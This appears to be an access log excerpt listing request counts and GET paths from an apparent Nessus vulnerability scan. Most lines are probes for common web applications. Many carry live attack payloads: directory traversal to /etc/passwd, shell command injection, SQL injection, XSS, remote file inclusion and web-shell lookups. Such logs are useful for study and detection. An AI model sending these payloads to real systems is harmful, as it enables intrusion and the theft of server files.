1 GET /cgi-local/ HTTP/1.1
1 GET /cgi-local/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc| HTTP/1.1
8 GET /cgi-mod/index.cgi HTTP/1.1
1 GET /cgi-public/ HTTP/1.1
1 GET /cgi-public/cgiip.exe/WService=wsbroker1/webtools/oscommand.w HTTP/1.1
1 GET /cgi-public/cgiip.exe/WService=wsbroker1/webutil/ping.p HTTP/1.1
1 GET /cgi-public/wsasp.dll/WService=wsbroker1/webtools/oscommand.w HTTP/1.1
1 GET /cgi-public/wsasp.dll/WService=wsbroker1/webutil/ping.p HTTP/1.1
1 GET /cgi-public/wsisa.dll/WService=wsbroker1/webtools/oscommand.w HTTP/1.1
1 GET /cgi-public/wsisa.dll/WService=wsbroker1/webutil/ping.p HTTP/1.1
1 GET /cgi-public/wsnsa.dll/WService=wsbroker1/webtools/oscommand.w HTTP/1.1
1 GET /cgi-public/wsnsa.dll/WService=wsbroker1/webutil/ping.p HTTP/1.1
1 GET /cgi-public/wspd_cgi.sh/WService=wsbroker1/webtools/oscommand.w HTTP/1.1
1 GET /cgi-public/wspd_cgi.sh/WService=wsbroker1/webutil/ping.p HTTP/1.1
1 GET /cgi-scripts/ HTTP/1.1
1 GET /cgi-shl/ HTTP/1.1
1 GET /cgi-shop/ HTTP/1.1
1 GET /cgi-sys/ HTTP/1.1
7 GET /cgi-sys/defaultwebpage.cgi HTTP/1.1
7 GET /cgi-sys/entropysearch.cgi HTTP/1.1
1 GET /cgi-sys/guestbook.cgi?user=cpanel&template=|/bin/id| HTTP/1.1
1 GET /cgi-sys/guestbook.cgi?user=cpanel&template=|/usr/bin/id| HTTP/1.1
1 GET /cgi-weddico/ HTTP/1.1
1 GET /cgi-win/ HTTP/1.1
1 GET /cgi/ HTTP/1.1
7 GET /cgi/mid.cgi HTTP/1.1
1 GET /cgi/tseekdir.cgi?location=/etc/passwd%00 HTTP/1.1
1 GET /cgi_bin/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc| HTTP/1.1
1 GET /cgibin/ HTTP/1.1
1 GET /cgiforum.pl?thesection=../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /cgiip.exe/WService=wsbroker1/webtools/oscommand.w HTTP/1.1
1 GET /cgiip.exe/WService=wsbroker1/webutil/ping.p HTTP/1.1
1 GET /cgilib/ HTTP/1.1
1 GET /cgis/ HTTP/1.1
1 GET /cgiscripts/ HTTP/1.1
1 GET /cgiwin/ HTTP/1.1
1 GET /cgiwrap/cgiwrap_error_page_handling_xss.nasl HTTP/1.1
1 GET /ch99.php HTTP/1.1
1 GET /changelog HTTP/1.1
1 GET /charts/wizard/index.php HTTP/1.1
1 GET /chassis/config/GeneralChassisConfig.html HTTP/1.1
1 GET /chat.php HTTP/1.1
1 GET /chat/!pwds.txt HTTP/1.1
1 GET /chat/ HTTP/1.1
1 GET /chat/chat.php HTTP/1.1
1 GET /chat/help/index.php?help_file=../../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /chat/index.php?act=sm_window&page=event&day=-1%20UNION%20SELECT%201%2c1717627923%2c1307171536%20-- HTTP/1.1
1 GET /chat/index.php HTTP/1.1
1 GET /chat/login.php?option=chat HTTP/1.1
1 GET /chat/upgradev1.php HTTP/1.1
1 GET /chora/ HTTP/1.1
1 GET /citrusdb/main.php HTTP/1.1
1 GET /ckeditor.js HTTP/1.1
1 GET /ckeditor/ckeditor.js HTTP/1.1
1 GET /ckeditor/plugins/image2/plugin.js HTTP/1.1
1 GET /ckeditor/plugins/preview/preview.html HTTP/1.1
1 GET /ckeditor/samples/sample_posteddata.php HTTP/1.1
1 GET /clan-nic/ HTTP/1.1
1 GET /clan-nic/index.php?file=News&op=phpinfo HTTP/1.1
1 GET /clan/ HTTP/1.1
1 GET /clan/index.php?file=News&op=phpinfo HTTP/1.1
1 GET /claroline/ HTTP/1.1
1 GET /claroline/index.php HTTP/1.1
1 GET /claroline/resourcelinker/resourcelinker.inc.php?clarolineRepositorySys=/etc/passwd%00 HTTP/1.1
1 GET /class/ HTTP/1.1
1 GET /classes/ HTTP/1.1
1 GET /classes/adodbt/sql.php?classes_dir=/etc/passwd%00 HTTP/1.1
1 GET /classified/ HTTP/1.1
1 GET /classifieds/ HTTP/1.1
1 GET /classifieds/index.php HTTP/1.1
1 GET /cld/ HTTP/1.1
1 GET /clearquest/about/default_content.asp HTTP/1.1
1 GET /clearspace/admin/login.jsp?url=main.jsp HTTP/1.1
2 GET /client/ HTTP/1.1
1 GET /clientaccesspolicy.xml HTTP/1.1
1 GET /cliente/ HTTP/1.1
1 GET /clientes/ HTTP/1.1
1 GET /clwarn.cgi HTTP/1.1
1 GET /cm/ HTTP/1.1
1 GET /cmd_ver HTTP/1.1
1 GET /cmf/login HTTP/1.1
1 GET /cmp/ HTTP/1.1
1 GET /cms/WorkArea/ContentDesigner/ekformsiframe.aspx?id=\">%3cscript%3ealert%28%27Nessus%27%29%3c%2fscript%3e HTTP/1.1
2 GET /cms/ HTTP/1.1
1 GET /cms/admin.php HTTP/1.1
1 GET /cms/admin/admin.php HTTP/1.1
1 GET /cms/admin/lang.php?CMS_ADMIN_PAGE=1&nls[file][cmsmadesimple_nls_file_include.nasl][1]=/etc/passwd&nls[file][cmsmadesimple_nls_file_include.nasl][2]=../COPYING HTTP/1.1
1 GET /cms/administrator/index.php HTTP/1.1
1 GET /cms/administrator/manifests/files/joomla.xml HTTP/1.1
1 GET /cms/e107_admin/admin.php HTTP/1.1
1 GET /cms/index.php?id=7kxgk6o2hd' HTTP/1.1
2 GET /cms/index.php HTTP/1.1
1 GET /cms/kernel/loadkernel.php?installPath=/etc/passwd%00 HTTP/1.1
1 GET /cms/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7b%7dsystem%28id%29%3bclass%20zZz_ADOConnection%7b%7d%2f%2f HTTP/1.1
1 GET /cms/modules/Printing/output.php?url=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== HTTP/1.1
1 GET /cms/modules/TinyMCE/content_css.php?templateid=-1/**/UNION/**/SELECT/**/1717627961,1,1125232106-- HTTP/1.1
1 GET /cms/themes/program/themesettings.inc.php?themesdir=/etc/passwd%00 HTTP/1.1
1 GET /cms/typo3/index.php HTTP/1.1
1 GET /cms/update.php HTTP/1.1
1 GET /cms400.net/ HTTP/1.1
1 GET /cms400/ HTTP/1.1
1 GET /cmsample/ HTTP/1.1
1 GET /cmsmadesimple/ HTTP/1.1
1 GET /cmsmadesimple/modules/Printing/output.php?url=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== HTTP/1.1
1 GET /cmsms/ HTTP/1.1
1 GET /cmsms/modules/Printing/output.php?url=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== HTTP/1.1
1 GET /cobalt-images/ HTTP/1.1
1 GET /cobbler/web HTTP/1.1
1 GET /cobbler_web HTTP/1.1
1 GET /code/ HTTP/1.1
3 GET /code/gitweb.cgi HTTP/1.1
3 GET /code/gitweb.perl HTTP/1.1
3 GET /code/gitweb.pl HTTP/1.1
1 GET /com/novell/webaccess/WebAccessUninstall.ini HTTP/1.1
1 GET /comersus/ HTTP/1.1
1 GET /comments.php?sort_by=phpwebgallery_sort_by_sql_injection.nasl HTTP/1.1
1 GET /comments.php HTTP/1.1
1 GET /comments/ HTTP/1.1
1 GET /commerce.cgi?page=../../../../../etc/passwd%00index.html HTTP/1.1
1 GET /common/ HTTP/1.1
1 GET /common/about.php HTTP/1.1
1 GET /common/visiteurs/include/menus.inc.php?lvc_include_dir=/etc/passwd%00 HTTP/1.1
2 GET /commoncgi/servlet/CCGIServlet?ApHost=PDT_InterScan_NT&CGIAlias=PDT_InterScan_NT&File=logout.htm HTTP/1.1
1 GET /commonspot/index.cfm HTTP/1.1
1 GET /commsrss.php?files[0]=../../../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /communicator/ HTTP/1.1
1 GET /community/ HTTP/1.1
1 GET /community/browse_blogs.php HTTP/1.1
1 GET /company/ HTTP/1.1
1 GET /components/com_fm/fm.install.php?lm_absolute_path=../../&install_dir=limbo_com_fm_php_shell.nasl-1717627950 HTTP/1.1
1 GET /compra/ HTTP/1.1
1 GET /compras/ HTTP/1.1
1 GET /compressed/ HTTP/1.1
1 GET /conecta/ HTTP/1.1
1 GET /conf/ HTTP/1.1
1 GET /conf/ssl/apache/integrity-smartcenter.key HTTP/1.1
1 GET /conf/ssl/apache/integrity.key HTTP/1.1
1 GET /config-browser/showJars.xhtml HTTP/1.1
1 GET /config.php?path[docroot]=/etc/passwd%00 HTTP/1.1
1 GET /config.php?returnpath=/etc/passwd%00 HTTP/1.1
1 GET /config/ HTTP/1.1
1 GET /config/oramon.ini HTTP/1.1
1 GET /configuration/config.dat HTTP/1.1
1 GET /configuration/galleryConfig.txt HTTP/1.1
1 GET /configurations.do HTTP/1.1
1 GET /confluence/500page.jsp HTTP/1.1
1 GET /confluence/ HTTP/1.1
1 GET /confluence/login.action HTTP/1.1
1 GET /connect/ HTTP/1.1
1 GET /console-selfservice/ HTTP/1.1
1 GET /console/%20HTTP/1.1%0d%0aHost:%20weblogic_plugin_http_injection.nasl%0d%0aX-Nessus:%20/index.jsp HTTP/1.0
1 GET /console/ HTTP/1.1
1 GET /console/faces/com_sun_web_ui/help/helpwindow.jsp?windowTitle=%3c/title%3e%3cscript%3ealert(%27sun_java_web_console_helpwindow_xss.nasl%27)%3c/script%3e HTTP/1.1
1 GET /console/faces/com_sun_web_ui/help/masthead.jsp?windowTitle=%3c/title%3e%3cscript%3ealert(%27sun_java_web_console_helpwindow_xss.nasl%27)%3c/script%3e HTTP/1.1
1 GET /console/login.action HTTP/1.1
1 GET /console/login/LoginForm.jsp HTTP/1.1
1 GET /contact.php HTTP/1.1
1 GET /contacts/php?cal_dir=http[:]//example[.]com/ HTTP/1.1
1 GET /contenido/ HTTP/1.1
1 GET /contenido/classes/class.inuse.php?cfg[path][contenido]=/etc/passwd%00 HTTP/1.1
1 GET /contenido/contenido/classes/class.inuse.php?cfg[path][contenido]=/etc/passwd%00 HTTP/1.1
1 GET /content.php?get_action=display_doc&doc_file=CREDITS HTTP/1.1
1 GET /content/ HTTP/1.1
1 GET /content/administrator/index.php HTTP/1.1
1 GET /content/administrator/manifests/files/joomla.xml HTTP/1.1
1 GET /content/control/checkLogin HTTP/1.1
1 GET /content/dsjkdjfljk.mp3 HTTP/1.0
1 GET /content/index.php HTTP/1.1
1 GET /content/odNsPkeOPR.mp3 HTTP/1.0
1 GET /contrib/forms/evaluation/C_FormEvaluation.class.php?fileroot=/etc/passwd%00 HTTP/1.1
1 GET /contribute.cgi?template=/etc/passwd&contribdir=.&plugin=alkalay_cmd_exec.nasl HTTP/1.1
1 GET /contribute.pl?template=/etc/passwd&contribdir=.&plugin=alkalay_cmd_exec.nasl HTTP/1.1
1 GET /controlpanel/ HTTP/1.1
1 GET /coppermine/ HTTP/1.1
1 GET /coppermine/db_input.php HTTP/1.1
1 GET /core/ HTTP/1.1
1 GET /core/adodb/server.php?sql='adodb_sql_sql_injection.nasl HTTP/1.1
1 GET /core/api.php?t_path_core=/etc/passwd%00 HTTP/1.1
1 GET /core/editor.php?editor_insert_bottom=/etc/passwd HTTP/1.1
1 GET /core/misc/drupal.js HTTP/1.1
1 GET /core/orionSplashScreen.do HTTP/1.1
1 GET /corp/ HTTP/1.1
1 GET /corporate/webpages/login.jsp HTTP/1.1
1 GET /corporate/webpages/sessionexpired.jsp HTTP/1.1
1 GET /correo/ HTTP/1.1
1 GET /counter.php?count_log_file=/nessus HTTP/1.1
1 GET /counter/ HTTP/1.1
1 GET /courier/web/1000@/wmLogin.html HTTP/1.1
1 GET /cpg/ HTTP/1.1
1 GET /cpg/db_input.php HTTP/1.1
1 GET /cq/about/default_content.asp HTTP/1.1
1 GET /cqweb/about/default_content.asp HTTP/1.1
1 GET /credit/ HTTP/1.1
2 GET /crm/ HTTP/1.1
1 GET /crm/index.php?action=Login&module=Users HTTP/1.1
1 GET /crm/index.php HTTP/1.1
1 GET /crm/login HTTP/1.1
1 GET /crm/page?view=about HTTP/1.1
1 GET /crm/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1717627898&lang_crm=../../../../../../../../../../../..//etc/passwd%00 HTTP/1.1
1 GET /crm/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1717627898&lang_crm=../../vtigerservice.php%00 HTTP/1.1
1 GET /cron/ HTTP/1.1
1 GET /crons/ HTTP/1.1
1 GET /crossdomain.xml HTTP/1.1
1 GET /crowd/ HTTP/1.1
1 GET /crowd/console/login.action HTTP/1.1
1 GET /crypto/ HTTP/1.1
1 GET /crystalimagehandler.aspx?dynamicimage=../../../../../../../../winnt/system.ini HTTP/1.1
1 GET /crystalreportViewers/crystalimagehandler.aspx?dynamicimage=../../../../../../../../winnt/system.ini HTTP/1.1
1 GET /cs/ContentServer HTTP/1.1
1 GET /cs/idcplg?IdcService=GET_ENVIRONMENT&IsJson=1 HTTP/1.1
1 GET /csSearch.cgi?command=savesetup&setup=print%20id`` HTTP/1.1
1 GET /csamc52/webadmin?page=invalid&type=browser HTTP/1.1
1 GET /csr/ HTTP/1.1
1 GET /css/ HTTP/1.1
1 GET /csv_db.cgi?file=|id| HTTP/1.1
1 GET /cuenta/ HTTP/1.1
1 GET /cuentas/ HTTP/1.1
1 GET /currency/ HTTP/1.1
1 GET /currently/ HTTP/1.1
1 GET /currently/protection.php?action=logout&siteurl=/etc/passwd HTTP/1.1
1 GET /customer.pl HTTP/1.1
1 GET /customers/ HTTP/1.1
1 GET /cute/ HTTP/1.1
1 GET /cute/index.php HTTP/1.1
1 GET /cutenews/ HTTP/1.1
1 GET /cutenews/index.php HTTP/1.1
1 GET /cvslog.cgi?file=<SCRIPT>window.alert</SCRIPT> HTTP/1.1
1 GET /cvstrac/ HTTP/1.1
1 GET /cvstrac/index HTTP/1.1
1 GET /cvsweb/ HTTP/1.1
1 GET /cwhp/CSMSDesktop/about.jsp HTTP/1.1
1 GET /cwhp/XmpFileDownloadServlet?parameterName=downloadDoc&downloadDirectory=..\\..\\..\\Windows\\System32\\drivers\\etc\\&readmeText=1 HTTP/1.1
1 GET /cwmail.exe HTTP/1.1
1 GET /cybercash/ HTTP/1.1
1 GET /d/ HTTP/1.1
1 GET /daloradius/ HTTP/1.1
1 GET /daloradius/login.php?error=%3e%22%3e%3cscript%3ealert%28%27daloradius_error_xss.nasl%27%29%3c%2fscript%3e HTTP/1.1
1 GET /dana-na/nc/nc_gina_ver.txt HTTP/1.1
1 GET /dana/fb/smb/ HTTP/1.1
1 GET /darkportal/ HTTP/1.1
1 GET /dat/ HTTP/1.1
1 GET /data/ HTTP/1.1
1 GET /data/fetch.php?page=' HTTP/1.1
1 GET /data/usr HTTP/1.1
1 GET /database/ HTTP/1.1
1 GET /databases/ HTTP/1.1
1 GET /datafiles/ HTTP/1.1
1 GET /dato/ HTTP/1.1
1 GET /datos/ HTTP/1.1
2 GET /day.php HTTP/1.1
1 GET /db/.git/HEAD HTTP/1.1
1 GET /db/.git/info/refs?service=git-upload-pack HTTP/1.1
1 GET /db/.svn/entries HTTP/1.1
1 GET /db/83.118.68.34.bc.googleusercontent.com.7z HTTP/1.1
1 GET /db/83.118.68.34.bc.googleusercontent.com.Z HTTP/1.1
1 GET /db/83.118.68.34.bc.googleusercontent.com.bz2 HTTP/1.1
1 GET /db/83.118.68.34.bc.googleusercontent.com.gz HTTP/1.1
1 GET /db/83.118.68.34.bc.googleusercontent.com.jar HTTP/1.1
1 GET /db/83.118.68.34.bc.googleusercontent.com.rar HTTP/1.1
1 GET /db/83.118.68.34.bc.googleusercontent.com.tar.bz2 HTTP/1.1
1 GET /db/83.118.68.34.bc.googleusercontent.com.tar.gz HTTP/1.1
1 GET /db/83.118.68.34.bc.googleusercontent.com.tar HTTP/1.1
1 GET /db/83.118.68.34.bc.googleusercontent.com.tgz HTTP/1.1
1 GET /db/83.118.68.34.bc.googleusercontent.com.war HTTP/1.1
1 GET /db/83.118.68.34.bc.googleusercontent.com.z HTTP/1.1
1 GET /db/83.118.68.34.bc.googleusercontent.com.zip HTTP/1.1
1 GET /db/83.118.68.34.googleusercontent.7z HTTP/1.1
1 GET /db/83.118.68.34.googleusercontent.Z HTTP/1.1
1 GET /db/83.118.68.34.googleusercontent.bz2 HTTP/1.1
1 GET /db/83.118.68.34.googleusercontent.gz HTTP/1.1
1 GET /db/83.118.68.34.googleusercontent.jar HTTP/1.1
1 GET /db/83.118.68.34.googleusercontent.rar HTTP/1.1
1 GET /db/83.118.68.34.googleusercontent.tar.bz2 HTTP/1.1
1 GET /db/83.118.68.34.googleusercontent.tar.gz HTTP/1.1
1 GET /db/83.118.68.34.googleusercontent.tar HTTP/1.1
1 GET /db/83.118.68.34.googleusercontent.tgz HTTP/1.1
1 GET /db/83.118.68.34.googleusercontent.war HTTP/1.1
1 GET /db/83.118.68.34.googleusercontent.z HTTP/1.1
1 GET /db/83.118.68.34.googleusercontent.zip HTTP/1.1
1 GET /db/CVS/Entries HTTP/1.1
1 GET /db/HEAD HTTP/1.1
1 GET /db/SnoopServlet/ HTTP/1.1
1 GET /db/_notes/dwsync.xml HTTP/1.1
1 GET /db/_vti_inf.html HTTP/1.1
8 GET /db/ HTTP/1.1
1 GET /db/awstatstotals.php?sort=\"].passthru('id').exit().%24a[\" HTTP/1.1
1 GET /db/awstatstotals.php?sort=\"].phpinfo().exit().%24a[\" HTTP/1.1
1 GET /db/awstatstotals.php?sort={%24{passthru(chr(105).chr(100))}}{%24{exit()}} HTTP/1.1
1 GET /db/awstatstotals.php?sort={%24{phpinfo()}}{%24{exit()}} HTTP/1.1
1 GET /db/biztalkhttpreceive.dll HTTP/1.1
1 GET /db/dwsync.xml HTTP/1.1
1 GET /db/faq.php HTTP/1.1
1 GET /db/fckeditor/editor/filemanager/connectors/connector?Command=CreateFolder&Type=File&CurrentFolder=/%00/&NewFolderName=fckeditor_java_currentfolder_dos.nasl HTTP/1.1
3 GET /db/index.jsp HTTP/1.1
1 GET /db/index.php HTTP/1.1
1 GET /db/info.php HTTP/1.1
1 GET /db/info/refs?service=git-upload-pack HTTP/1.1
1 GET /db/nessus/ HTTP/1.1
1 GET /db/o7LCQt3q.htm HTTP/1.1
1 GET /db/phpinfo.php HTTP/1.1
1 GET /db/portal/diag/index.jsp HTTP/1.1
1 GET /db/r57.php HTTP/1.1
1 GET /db/r57shell.php HTTP/1.1
1 GET /db/rol.php HTTP/1.1
1 GET /db/sitemap.xml HTTP/1.1
1 GET /db/snoop/ HTTP/1.1
1 GET /db/snoopservlet/ HTTP/1.1
1 GET /db/spaw/dialogs/confirm.php?spaw_root=/etc/passwd%00 HTTP/1.1
1 GET /db/static/./WEB-INF/web.xml HTTP/1.1
1 GET /db/struts/webconsole.html HTTP/1.1
2 GET /db/users.dat HTTP/1.1
1 GET /db/www.83.118.68.34.bc.googleusercontent.com.7z HTTP/1.1
1 GET /db/www.83.118.68.34.bc.googleusercontent.com.Z HTTP/1.1
1 GET /db/www.83.118.68.34.bc.googleusercontent.com.bz2 HTTP/1.1
1 GET /db/www.83.118.68.34.bc.googleusercontent.com.gz HTTP/1.1
1 GET /db/www.83.118.68.34.bc.googleusercontent.com.jar HTTP/1.1
1 GET /db/www.83.118.68.34.bc.googleusercontent.com.rar HTTP/1.1
1 GET /db/www.83.118.68.34.bc.googleusercontent.com.tar.bz2 HTTP/1.1
1 GET /db/www.83.118.68.34.bc.googleusercontent.com.tar.gz HTTP/1.1
1 GET /db/www.83.118.68.34.bc.googleusercontent.com.tar HTTP/1.1
1 GET /db/www.83.118.68.34.bc.googleusercontent.com.tgz HTTP/1.1
1 GET /db/www.83.118.68.34.bc.googleusercontent.com.war HTTP/1.1
1 GET /db/www.83.118.68.34.bc.googleusercontent.com.z HTTP/1.1
1 GET /db/www.83.118.68.34.bc.googleusercontent.com.zip HTTP/1.1
1 GET /db/www.83.118.68.34.googleusercontent.7z HTTP/1.1
1 GET /db/www.83.118.68.34.googleusercontent.Z HTTP/1.1
1 GET /db/www.83.118.68.34.googleusercontent.bz2 HTTP/1.1
1 GET /db/www.83.118.68.34.googleusercontent.gz HTTP/1.1
1 GET /db/www.83.118.68.34.googleusercontent.jar HTTP/1.1
1 GET /db/www.83.118.68.34.googleusercontent.rar HTTP/1.1
1 GET /db/www.83.118.68.34.googleusercontent.tar.bz2 HTTP/1.1
1 GET /db/www.83.118.68.34.googleusercontent.tar.gz HTTP/1.1
1 GET /db/www.83.118.68.34.googleusercontent.tar HTTP/1.1
1 GET /db/www.83.118.68.34.googleusercontent.tgz HTTP/1.1
1 GET /db/www.83.118.68.34.googleusercontent.war HTTP/1.1
1 GET /db/www.83.118.68.34.googleusercontent.z HTTP/1.1
1 GET /db/www.83.118.68.34.googleusercontent.zip HTTP/1.1
1 GET /db_input.php HTTP/1.1
2 GET /db HTTP/1.1
1 GET /dbase/ HTTP/1.1
1 GET /dcforum.cgi?az=list&forum=../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /dcforum/ HTTP/1.1
1 GET /dcforum/dcforum.cgi?az=list&forum=../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /ddem/ HTTP/1.1
1 GET /ddreport/ HTTP/1.1
1 GET /ddrint/ HTTP/1.1
1 GET /de/ HTTP/1.1
1 GET /default.cfm?Mode=debug HTTP/1.1
1 GET /default.cfml?Mode=debug HTTP/1.1
1 GET /default.php/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 HTTP/1.1
1 GET /default.php3/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 HTTP/1.1
1 GET /default.php HTTP/1.1
1 GET /demo/ HTTP/1.1
1 GET /demoauct/ HTTP/1.1
1 GET /demomall/ HTTP/1.1
1 GET /demos/ HTTP/1.1
1 GET /demos/demo.browse.php?filename=/etc/passwd HTTP/1.1
1 GET /design/ HTTP/1.1
1 GET /detail.asp?nChannel='1 HTTP/1.1
2 GET /dev/ HTTP/1.1
1 GET /devel/ HTTP/1.1
1 GET /development/ HTTP/1.1
1 GET /device HTTP/1.1
1 GET /devinfo.xml HTTP/1.1
1 GET /dfcweb/lib/cupm/nls/applicationproperties.js HTTP/1.1
1 GET /dfshealth.jsp HTTP/1.1
1 GET /dir/ HTTP/1.1
1 GET /direct.php?rf=/etc/passwd%00 HTTP/1.1
1 GET /directory.php?dir=%3Bcat%20/etc/passwd HTTP/1.1
1 GET /directory/ HTTP/1.1
1 GET /directory/index.php?go=detail&id=-99999/**/UNION/**/SELECT/**/0,1,concat(1717627930,0x3a,494874244),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 HTTP/1.1
1 GET /directory/index.php?go=detail&id=-99999/**/UNION/**/SELECT/**/0,1,concat(1717627930,0x3a,494874244),3,4,5,6,7,8,9,10,11,12,13,14,15,16 HTTP/1.1
1 GET /directorymanager/ HTTP/1.1
1 GET /directorypro.cgi?want=showcat&show=../../../../../etc/passwd%00 HTTP/1.1
1 GET /discuz/ HTTP/1.1
1 GET /discuz/index.php HTTP/1.1
1 GET /disp_album.php?id_album=0+or+1=1 HTTP/1.1
1 GET /display.cgi?preftemp=temp&page=anonymous&file=|id| HTTP/1.1
1 GET /dl/ HTTP/1.1
1 GET /dl/pafiledb.php HTTP/1.1
1 GET /dll/ HTTP/1.1
1 GET /dm/ HTTP/1.1
1 GET /dms/ HTTP/1.1
1 GET /dms0/ HTTP/1.1
1 GET /dms2/Login.jsp HTTP/1.1
1 GET /dmsdump/ HTTP/1.1
1 GET /dndirector/dashboard/Show.dn HTTP/1.1
1 GET /dndirector HTTP/1.1
1 GET /doc-html/ HTTP/1.1
1 GET /doc/ HTTP/1.1
1 GET /doc/admin/index.php?ptinclude-http[:]//example[.]com HTTP/1.1
1 GET /doc/index.php?s=/etc/passwd%00 HTTP/1.1
1 GET /doc/script/lib/seajs/config/sea-config.js HTTP/1.1
1 GET /doc1/ HTTP/1.1
1 GET /docbuilder/top.php HTTP/1.1
1 GET /doceboCms/ HTTP/1.1
1 GET /doceboCms/index.php HTTP/1.1
1 GET /doceboCore/ HTTP/1.1
1 GET /doceboCore/index.php HTTP/1.1
1 GET /doceboKms/ HTTP/1.1
1 GET /doceboKms/index.php HTTP/1.1
1 GET /doceboLms/ HTTP/1.1
1 GET /doceboLms/index.php HTTP/1.1
1 GET /docman/new.php HTTP/1.1
1 GET /docs.php?doc=../jpgraph-1.12.1/docs/index HTTP/1.1
1 GET /docs/CHANGES HTTP/1.1
1 GET /docs/ HTTP/1.1
1 GET /docs/index.php?lang=/../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /docs/index.php?show=../../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /docs/servlets/index.html HTTP/1.1
1 GET /docs1/ HTTP/1.1
1 GET /document/ HTTP/1.1
1 GET /documentation/ HTTP/1.1
1 GET /documentation/index.php?show=../../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /documents/ HTTP/1.1
1 GET /docushare/ HTTP/1.1
1 GET /docushare/dsweb/Services/User-1%22%3e%3cBODY%20ONLOAD%3dalert%28%27xerox_docushare_dsweb_xss.nasl%27%29%3e HTTP/1.1
1 GET /dokeos/ HTTP/1.1
1 GET /dokeos/claroline/resourcelinker/resourcelinker.inc.php?clarolineRepositorySys=/etc/passwd%00 HTTP/1.1
2 GET /dokeos/index.php HTTP/1.1
1 GET /doku.php HTTP/1.1
1 GET /doku/ HTTP/1.1
1 GET /doku/doku.php HTTP/1.1
1 GET /dokuwiki/ HTTP/1.1
1 GET /dokuwiki/doku.php HTTP/1.1
2 GET /dolibarr/ HTTP/1.1
1 GET /dolphin/ HTTP/1.1
1 GET /dolphin/plugins/safehtml/HTMLSax3.php?dir[plugins]=/etc/passwd%00 HTTP/1.1
1 GET /dolphin/plugins/safehtml/safehtml.php?dir[plugins]=/etc/passwd%00 HTTP/1.1
1 GET /dolphin/ray/modules/global/inc/content.inc.php?sIncPath=/etc/passwd%00 HTTP/1.1
1 GET /dotProject/ HTTP/1.1
1 GET /dotProject/includes/db_adodb.php?baseDir=/etc/passwd%00 HTTP/1.1
1 GET /dotProject/index.php HTTP/1.1
1 GET /dotcms/ HTTP/1.1
1 GET /dotcms/getting_started/macros/macros_detail.dot?id=../../../../../../../../../../../..//etc/passwd%00.html HTTP/1.1
1 GET /dotcms/news/index.dot?id=../../../../../../../../../../../..//etc/passwd%00.jpg HTTP/1.1
1 GET /dotnetnuke/ HTTP/1.1
1 GET /dotproject/ HTTP/1.1
1 GET /dotproject/includes/db_adodb.php?baseDir=/etc/passwd%00 HTTP/1.1
1 GET /dotproject/index.php HTTP/1.1
1 GET /down/ HTTP/1.1
1 GET /download.php?id=' HTTP/1.1
1 GET /download.php?language=/etc/passwd%00 HTTP/1.1
1 GET /download/ HTTP/1.1
1 GET /download/force-download.php HTTP/1.1
1 GET /downloads/ HTTP/1.1
1 GET /downloads/force-download.php HTTP/1.1
2 GET /downloads/index.php HTTP/1.1
1 GET /downloads/pafiledb.php HTTP/1.1
1 GET /dp/login.xml HTTP/1.1
1 GET /dpnepolicyservice/DPNECentral.asmx HTTP/1.1
1 GET /druid/index.html HTTP/1.1
2 GET /drupal/ HTTP/1.1
1 GET /drupal/core/misc/drupal.js HTTP/1.1
1 GET /drupal/misc/drupal.js HTTP/1.1
1 GET /drupal/update.php?op=info HTTP/1.1
1 GET /dsc/ HTTP/1.1
1 GET /dsdn/ HTTP/1.1
1 GET /dsdn/dsweb/Services/User-1%22%3e%3cBODY%20ONLOAD%3dalert%28%27xerox_docushare_dsweb_xss.nasl%27%29%3e HTTP/1.1
1 GET /dspam/ HTTP/1.1
1 GET /dsweb/Services/User-1%22%3e%3cBODY%20ONLOAD%3dalert%28%27xerox_docushare_dsweb_xss.nasl%27%29%3e HTTP/1.1
1 GET /dswsbobje/ HTTP/1.1
1 GET /dswsbobje/axis2-web/index.jsp HTTP/1.1
1 GET /dtlt/home.html HTTP/1.1
1 GET /dump/ HTTP/1.1
1 GET /durep/ HTTP/1.1
1 GET /dwr/index.html HTTP/1.1
1 GET /dynamicpages/fast/config_page.php?do=add_page&du=site&edp_relative_path=http[:]//example[.]com/ HTTP/1.1